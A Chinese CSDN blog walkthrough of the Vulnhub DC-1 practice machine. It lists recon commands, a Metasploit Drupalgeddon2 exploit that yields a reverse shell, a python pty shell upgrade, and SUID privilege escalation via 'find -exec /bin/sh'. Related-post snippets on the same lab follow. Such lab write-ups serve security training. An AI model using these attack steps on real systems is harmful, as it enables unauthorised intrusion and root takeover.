简单系列靶场dc1

最新推荐文章于 2024-08-18 18:39:17 发布
最新推荐文章于 2024-08-18 18:39:17 发布
阅读量360 收藏 10
点赞数 9
分类专栏: dc系列 文章标签: 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dj445566/article/details/134652960
版权

一、信息收集

1.确定目标IP

arp-scan -l

目标IP:192.168.222.131

2.扫描开放端口

nmap -sV -A -p- 192.168.222.131

开放端口:22-ssh 80-http

3.目录爆破

dirsearch -u http://192.168.222.131

4.指纹识别

whatweb -v http://192.168.222.131

二、漏洞查找

1.通过指纹识别发现网站框架

2.查找框架漏洞

3.查找到一个漏洞,到MSF看漏洞是否存在

search Drupalgeddon2

4.漏洞存在,尝试利用

use 0
set rhosts 192.168.222.131
run

三、提权

1.成功反弹shell,改造bash

python -c "import pty;pty.spawn('/bin/bash')"

2.查看suid权限

find / -perm -u=s -type f 2>/dev/null

3.发现find可以提权,提权成功

find /etc/passwd -exec '/bin/sh' \;

4.找到flag

dj445566
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
esp_dc1:DC1插线板固件
04-14
ESP DC1斐讯DC1智能排插个人固件.WHY众所周知的原因,斐讯服务器已经不能正常访问,插座的APP控制已经无法正常实现,需要有另外的方式实现插座的控制。已有的方法为内网劫持实现,具体可参考。这次要实现的是通过一...
Vulnhub靶场 | DC系列 - DC1
哦 卷!
07-13 1164
发现该网站是 drupal[//]: # (Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。根据上面flag1.txt的提示,在网站目录中寻找相应的配置文件(当然没有提示,也应该寻找看一下,毕竟是敏感文件)。,则需要登录flag4用户。查看 users 表中的内容:由于列数比较多,查看内容比较乱,可以使用。尝试查看flag4用户的家目录,确实存在flag4.txt文件,
vulnhub DC1 靶场练习
鸥鹭忘机
08-10 1935
前言 这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。下面就直接开始把。 配置靶机 和上一台靶机一样,打开没有自动分配到IP。如何配置可以看我上一篇博客https://blog.csdn.net/rpsate/article/details/119494515。但是这一次在配置的最后一步——重启
DC1靶场通关详细记录】
博客
12-14 809
主机渗透DC系列靶场-DC1靶场通关详情记录:使用msf直接对CMS的漏洞进行攻击,find的suid提权方法。
DC系列靶场---DC 1靶场的渗透测试(一)
zhouA0221的博客
07-17 1275
也就是提示我们去查看这个CMS的配置文件。因为Drupal是开源的所以我们是可以通过搜索引擎搜到配置文件的路径的。我们的思路可以从官方文档中查找一些关于drupal7的密码恢复之类的文件。这里用户有两个用户,我们只需要关注admin这个用户,这个应该是网站管理员的账户和密码。我们已经成功登录到目标主机的mysql数据库了,我们看一下数据库中有哪些重要的信息。看到这是flag2,从flag2中我们可以看到这是mysql的账号和密码。看到一个users的数据表,这个表中我们通过名字应该能猜测到这个是用户表。
vulnhub靶场,DC-1
kukudeshuo的博客
07-10 675
vulnhub靶场,DC-1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 攻击机:kali(192.168.58.130) 靶机:DC-1(192.168.58.144) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用netdiscover或者arp-scan -l扫描机器网卡上的所有ip 确定靶机目标为192.168.58.144 使用nmap扫描目标靶机端口
内网渗透DC-1靶场通关(CTF)
qq_35664104的博客
08-12 1320
最新博客见我的个人博客地址 DC系列共9个靶场,本次来试玩一下DC-1,共有5个flag,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 首先在kali中扫一下目标ip arp-scan -l 通过排除,发现目标ip为:192.168.0.119 经典套路,nmap扫一把 nmap -sS -sV 192.168.0.119 发现目标开启80和22端口 我们先看一下他的
vuln靶场——DC-1
qq_54480761的博客
05-03 1442
我们切换语句进入shell,执行whoami查看当前的权限,执行ls查看当前目录下的文件,切换到root目录。典型的drupal,启动Metersploit,MSF存在drupal模块,尝试使用msf渗透。查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件。搜索Drupal 7的漏洞发现可利用的漏洞很多,搜索与Drupal 7相关的漏洞利用模块。登陆战点之后,随便点几个选项,例如左上角的Content,发现flag3。进行登录,密码是之前我们自己替换的。
DC系列靶场---DC 3靶场的渗透测试(二)
zhouA0221的博客
07-29 761
5、提权流程表示系统发行版本和内核版本》找到匹配的版本exp》exp传输到目标主机》一般传输到tmp目录(临时文件),执行payload。表示系统发行版本和内核版本》找到匹配的版本exp》exp传输到目标主机》一般传输到tmp目录(临时文件),执行payload。使用wget进行下载(这里我们要访问kali的IP地址,因为我们是在kali中架设的)3、我们使用sqlmap注入时对数据库操作的顺序:数据库--表--字段--数据。4、在进行木马上传时,要先了解CMS的架构,知道我们上传木马的路径。
靶机DC-1 WP
m0_66638011的博客
05-11 1727
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
DC1_map_airtrafficcontrol_
10-02
Map值的计算通常基于一系列复杂的算法,包括对不同类型的告警事件、告警频率、告警严重程度等因素的统计和分析。 DC1.m 文件可能是用MATLAB编程语言编写的脚本或函数,用于执行Map值的计算和可视化。MATLAB是一种...
斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT
02-18
DC1固件斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT 斐讯DC1插座固件斐讯DC1插座固件斐讯DC1插座固件
【qt】基于tcp的消息发送
yyqzjw的博客
08-18 322
我们需要实现客户端发消息,服务端接收消息。
Linux网络设置
最新发布
Lwc1027的博客
08-18 1219
根据pid查询5、查看端口查看网络配置的几个命令又ifconfig、hostname、route、netstat、ss,可以查看网卡,路由表还有统计信息,可以直接指定查询需要的指令。
RegFormer:用于大规模点云配准的高效投影感知Transformer网络
人工智能小白
08-18 756
2023年ICCV论文RegFormer的论文解读,点云配准工作背景,网络结构,实验分析
day 28 HTTP协议
2301_79909332的博客
08-17 399
UDP MTU最大传输单元(理论:65535 实际:1500)TCP发送数据是连续的,两次发送的数据可能粘连成一包被接收到。例如:https://www.baidu.com。3.客户端向发送HTTP请求报文,告诉服务器想要的数据。4.服务器回复HTTP响应报文,将客户端要的数据发回。长连接:通信前建立链接,通过新过程中链接一直保持。1、HTTP:超文本传输协议,在协议的应用层。1.协议://主机:端口号/资源路径。UDP是无连接的,面向数据包的传输方式。TCP是面向连接的,面向字节流传输方式。
dc1无法反弹shell
08-05
回答: 反弹shell的问题可能是由于配置或命令错误导致的。请确保您按照正确的步骤执行了反弹shell的过程。首先,您需要确保攻击机上的监听程序已经正确启动,可以使用nc命令监听指定的端口。接下来,您需要确保在目标...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值